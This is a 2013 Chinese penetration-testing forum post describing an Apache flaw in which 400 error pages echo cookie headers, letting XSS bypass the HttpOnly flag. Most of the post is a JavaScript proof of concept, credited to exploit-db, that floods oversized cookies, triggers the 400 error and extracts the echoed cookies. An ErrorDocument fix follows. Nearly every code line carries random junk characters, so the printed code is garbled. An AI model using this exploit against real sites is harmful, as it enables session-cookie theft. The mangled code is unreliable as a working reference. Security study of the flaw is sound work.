中国网络渗透测试联盟

标题: Apache HttpOnly Cookie XSS跨站漏洞 [打印本页]
作者: admin    时间: 2013-4-19 19:15
标题: Apache HttpOnly Cookie XSS跨站漏洞
很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。
( Y' r! W0 J4 D/ e1 d8 N/ O4 R. h( ]% C3 y# c& E
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:# a7 {6 B9 B- I9 y
- L0 A+ K# B. e& s/ ]

" u( b! Z3 d& k: [1 f- B// http://www.exploit-db.com/exploits/18442/
" S; C! o' h9 `  nfunction setCookies (good) {
' m, c" w2 z" E  r1 d- w8 W// Construct string for cookie value
# }4 J$ y0 U: h+ A3 S- d1 Z1 hvar str = "";6 T3 ]  w/ C7 u( P: V
for (var i=0; i< 819; i++) {! q4 f8 R- K2 j
str += "x";5 S  _9 g% J' |) f6 L
}
9 W5 ?, S; _- V: O/ p& ~// Set cookies6 A- W% f) L& \) \! c1 }
for (i = 0; i < 10; i++) {* C4 V2 }; X+ B! O# ?9 L; k- U, s
// Expire evil cookie
; G0 o( c9 k: x: U2 b0 ^3 v9 Xif (good) {2 J. D/ `4 J+ d. c
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
' e6 r3 I1 G' U2 {% j+ u/ u}
0 w( `0 L# [, \# z$ e8 s  W// Set evil cookie
0 O4 g' `9 t  I: d- ^6 H2 Jelse {
( c4 b/ C) g5 G, m' D7 j+ b) rvar cookie = "xss"+i+"="+str+";path=/";
4 _: D6 F8 P3 d7 S5 U8 P5 _}# f9 K. z+ x! _. y+ s
document.cookie = cookie;
* g" x- A9 K+ r* G8 l& J}
- W/ T2 s8 `  R, ]}
# Z% J# ]. K3 ?) I: Mfunction makeRequest() {" ^+ d0 P, ]" o; y
setCookies();
9 h6 P5 L, J* Y2 m7 cfunction parseCookies () {: e2 B/ b0 K1 g" A
var cookie_dict = {};1 r+ e' d3 w4 ~! J: M4 i& b' W
// Only react on 400 status1 S7 t" q, X8 T6 ~4 a" j
if (xhr.readyState === 4 && xhr.status === 400) {! e! G, [! b1 _/ m7 |- g8 d/ \
// Replace newlines and match <pre> content& Z5 {2 v% L) L/ A6 v
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
$ W8 t7 ~" }/ G$ ?1 y' a1 v2 hif (content.length) {
; a0 Q* U3 \+ }" B// Remove Cookie: prefix" Z, t+ J5 u; M7 q+ Q
content = content[1].replace("Cookie: ", "");
3 k5 h2 W  T8 \. D8 Lvar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);4 `: i# N5 t. Q
// Add cookies to object
) b, O( N0 Y2 e9 x5 N2 D& O! Rfor (var i=0; i<cookies.length; i++) {
4 c4 Q+ X6 j- @" B* h1 bvar s_c = cookies.split('=',2);
( L/ T; n. a' w) L0 H' Icookie_dict[s_c[0]] = s_c[1];
# h6 v6 e+ \' W3 w}
1 _! b. Z% r# e/ B8 _}! S$ I2 ^( N" w
// Unset malicious cookies4 U; }3 a. `; F; S
setCookies(true);
5 ]- l/ t6 p+ a1 Malert(JSON.stringify(cookie_dict));
5 [: \( S' |. z: J}
& q7 Z; Q. e0 H. d! x  s+ ]& F1 q}
+ p3 Z4 [; {9 B; Y3 L// Make XHR request  o4 _8 @2 v1 p: {) g2 L% a# P5 N
var xhr = new XMLHttpRequest();
2 |% s4 `/ x& ~3 J8 U1 H* ^xhr.onreadystatechange = parseCookies;7 o2 E! O3 m7 ?: _% H0 G
xhr.open("GET", "/", true);( _+ G. I% C. h: r( b
xhr.send(null);
: g1 n- A! v; Y! a, ~; I}
( `9 t' L/ d' m+ N( R' _makeRequest();7 w* m" `! y  s

/ a! v2 u6 M" L( W) a3 p你就能看见华丽丽的400错误包含着cookie信息。3 h' U* @4 p" x4 I% m2 I
6 H2 x! S5 |" [* e. E' \
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#: j% r: v" r0 ?/ ~

; a8 P$ k# l% T1 |, U修复方案:
5 F% H' k- b- L, Y4 O
- O4 s: G# d8 D5 p: M0 QApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
6 N; `7 y+ Q- r  V. H, C* ]* h4 W1 R. R$ k& `
In the event of a problem or error, Apachecan be configured to do one of four things,0 P6 }: e% f7 S$ w1 s

) T, C) L1 N. B" W+ G' t1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
& t% t' X: J' s! o6 o% d* d2. output acustomized message输出一段信息
, g$ x2 G. y9 m! J: a3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 . r$ n$ v9 q0 z6 k; d# _8 i
4. redirect to an external URL to handle theproblem/error转向一个外部URL
4 Y& n3 f& [  y- H9 y" y* t& L0 D) T3 h6 u4 f
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
( }% d2 O: m6 ]" P  {5 A
, ?+ ^$ Y% X" `+ {1 f: v1 @" P) ZApache配置:
6 v; n! Z9 r9 x* p- e+ O$ b
9 t7 s: y  u$ C  b$ b/ VErrorDocument400 " security test"
( T6 J& A( O& Y4 u! @! t7 G* V4 t; A# P$ V7 D6 R" ^; M
当然,升级apache到最新也可:)。- h7 C" s- M8 A7 l

! E9 |2 Q+ n, U参考:http://httpd.apache.org/security/vulnerabilities_22.html' {! W( ?* D* f

5 [# D" S# l8 m. g4 Y



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2